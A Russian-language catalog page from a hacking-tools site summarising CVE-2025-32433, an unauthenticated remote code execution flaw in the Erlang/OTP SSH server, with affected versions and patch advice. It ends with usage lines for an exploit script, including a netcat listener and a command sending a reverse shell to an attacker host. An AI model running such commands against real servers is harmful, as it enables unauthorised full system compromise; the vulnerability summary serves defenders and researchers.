Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32433 — CVE-2025-32433: сводка и обзор атак | Kitploit
Инструменты/GitHubGitHub/mrdreamreal/cve-2025-32433
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubmrdreamreal/cve-2025-32433

CVE-2025-32433

CVE-2025-32433: сводка и обзор атак

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-32433

Краткое описание и обзор атаки CVE-2025-32433

CVE-2025-32433 — это критическая уязвимость удаленного выполнения кода (RCE) без аутентификации в SSH-сервере Erlang/OTP, раскрытая 16 апреля 2025 года. Erlang/OTP SSH — это библиотека, используемая в различных распределенных и телекоммуникационных приложениях. Ошибка возникает из-за неправильной обработки сообщений протокола SSH: сервер не соблюдает нормальную последовательность аутентификации, что позволяет злоумышленнику отправлять специально сформированные SSH-сообщения до прохождения аутентификации. Таким образом, атакующий может внедрить и выполнить произвольный код Erlang на сервере​ nvd.nist.gov ​ offsec.com . На практике это означает, что злоумышленник, имеющий сетевой доступ к уязвимому SSH-серверу Erlang/OTP (часто работающему от root), может инициировать обратную оболочку или выполнять команды без каких-либо учетных данных, что приводит к полной компрометации системы​ nvd.nist.gov ​ offsec.com . Данной уязвимости присвоен рейтинг CVSS 10.0 (максимальная критичность)​ offsec.com .

Уязвимые версии — все релизы Erlang/OTP ниже OTP-27.3.3, OTP-26.2.5.11 или OTP-25.3.2.20 (исправленные версии)​ nvd.nist.gov ​ offsec.com . В зоне риска часто находятся Linux-серверы или устройства, запускающие SSH-демон на основе Erlang (не путать с OpenSSH). Важно: стандартные серверы OpenSSH на Linux/BSD не уязвимы​ offsec.com . Пользователям следует предполагать, что любой открытый SSH-сервер Erlang/OTP затронут, и немедленно установить официальные исправления или отключить службу SSH.

Атака работает следующим образом: инициируется SSH-соединение, после чего вне очереди отправляется последовательность SSH-сообщений. :

использование:

sudo chmod +x exploit.py

nc -nvlp

python3 exploit.py -t -p 22 --lhost --lport

пример:

nc -nvlp 5555

python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555

Скачать инструмент